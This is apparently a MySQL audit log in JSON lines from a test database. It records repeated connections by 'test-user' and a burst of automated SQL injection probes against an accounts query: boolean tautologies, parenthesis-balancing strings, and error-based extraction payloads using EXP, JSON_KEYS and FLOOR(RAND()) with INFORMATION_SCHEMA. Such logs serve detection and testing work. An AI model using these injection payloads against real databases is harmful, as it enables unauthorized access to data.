{"audit_record":{"name":"Connect","record":"14662_2017-04-26T17:30:31","timestamp":"2017-04-26T18:52:14 UTC","connection_id":"156","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14663_2017-04-26T17:30:31","timestamp":"2017-04-26T18:52:14 UTC","command_class":"select","connection_id":"156","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14664_2017-04-26T17:30:31","timestamp":"2017-04-26T18:52:14 UTC","connection_id":"156","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14665_2017-04-26T17:30:31","timestamp":"2017-04-26T18:52:29 UTC","connection_id":"157","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14666_2017-04-26T17:30:31","timestamp":"2017-04-26T18:52:29 UTC","command_class":"select","connection_id":"157","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14667_2017-04-26T17:30:31","timestamp":"2017-04-26T18:52:29 UTC","connection_id":"157","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14668_2017-04-26T17:30:31","timestamp":"2017-04-26T18:52:56 UTC","connection_id":"158","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14669_2017-04-26T17:30:31","timestamp":"2017-04-26T18:52:56 UTC","command_class":"select","connection_id":"158","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14670_2017-04-26T17:30:31","timestamp":"2017-04-26T18:52:56 UTC","connection_id":"158","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14671_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:10 UTC","connection_id":"159","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14672_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:10 UTC","command_class":"select","connection_id":"159","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14673_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:10 UTC","connection_id":"159","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14674_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:23 UTC","connection_id":"160","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14675_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:23 UTC","command_class":"select","connection_id":"160","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14676_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:23 UTC","connection_id":"160","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14677_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:23 UTC","connection_id":"161","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14678_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:23 UTC","command_class":"select","connection_id":"161","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14679_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:23 UTC","connection_id":"161","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14680_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"162","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14681_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"162","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14682_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"162","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14683_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"163","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14684_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"163","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1)(.\"'.,(((","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14685_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"163","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14686_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"164","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14687_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"164","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1'BvHjQF<'\">GLHpNB","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14688_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"164","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14689_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"165","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14690_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"165","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1) AND 1644=5902-- mIQr","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14691_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"165","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14692_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"166","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14693_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"166","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1) AND 3483=3483-- mCTF","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14694_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"166","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14695_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"167","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14696_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"167","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1) AND 7156=8806 AND (1768=1768","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14697_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"167","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14698_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"168","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14699_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"168","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1) AND 3483=3483 AND (7213=7213","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14700_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"168","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14701_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"169","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14702_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"169","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1)) AND 5775=6370 AND ((9758=9758","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14703_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"169","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14704_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"170","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14705_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"170","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1)) AND 3483=3483 AND ((4199=4199","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14706_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"170","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14707_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"171","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14708_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"171","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1))) AND 8588=7276 AND (((4761=4761","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14709_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"171","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14710_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"172","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14711_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"172","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1))) AND 3483=3483 AND (((5581=5581","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14712_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"172","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14713_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"173","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14714_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"173","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1 AND 7535=5477","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14715_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"173","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14716_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"174","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14717_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"174","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1 AND 3483=3483","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14718_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"174","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14719_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"175","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14720_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"175","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1 AND 4205=6537","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14721_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"175","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14722_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"176","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14723_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"176","status":1690,"sqltext":"SELECT * FROM accounts WHERE account_id=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b767171,(SELECT (ELT(7235=7235,1))),0x716a787a71,0x78))s), 8446744073709551610, 8446744073709551610)))","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14724_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"176","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14725_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"177","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14726_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"177","status":1690,"sqltext":"SELECT * FROM accounts WHERE account_id=1 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b767171,(SELECT (ELT(8522=8522,1))),0x716a787a71,0x78))s), 8446744073709551610, 8446744073709551610)))","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14727_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"177","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14728_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"178","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14729_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"178","status":1690,"sqltext":"SELECT * FROM accounts WHERE account_id=1 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x716b767171,(SELECT (ELT(1233=1233,1))),0x716a787a71,0x78))x))","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14730_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"178","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14731_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"179","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14732_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"179","status":1690,"sqltext":"SELECT * FROM accounts WHERE account_id=1 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x716b767171,(SELECT (ELT(9656=9656,1))),0x716a787a71,0x78))x))","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14733_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"179","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14734_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"180","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14735_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"180","status":1370,"sqltext":"SELECT * FROM accounts WHERE account_id=1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x716b767171,(SELECT (ELT(6029=6029,1))),0x716a787a71)) USING utf8)))","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14736_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"180","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14737_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"181","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14738_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"181","status":1370,"sqltext":"SELECT * FROM accounts WHERE account_id=1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x716b767171,(SELECT (ELT(4192=4192,1))),0x716a787a71)) USING utf8)))","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14739_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"181","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14740_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"182","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14741_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"182","status":1062,"sqltext":"SELECT * FROM accounts WHERE account_id=1 AND (SELECT 1457 FROM(SELECT COUNT(*),CONCAT(0x716b767171,(SELECT (ELT(1457=1457,1))),0x716a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14742_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"182","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14743_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"183","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14744_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"183","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=(SELECT CONCAT(0x716b767171,(SELECT (ELT(6218=6218,1))),0x716a787a71))","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14745_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"183","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14746_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"184","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14747_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"184","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14748_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"184","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14749_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"185","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14750_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"185","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14751_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"185","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14752_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"186","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14753_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"186","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14754_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"186","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14755_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"187","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14756_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"187","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14757_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"187","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14758_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"188","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14759_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"188","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14760_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"188","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14761_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"189","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14762_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"189","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14763_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"189","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14764_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"190","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14765_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"190","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14766_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"190","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14767_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"191","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
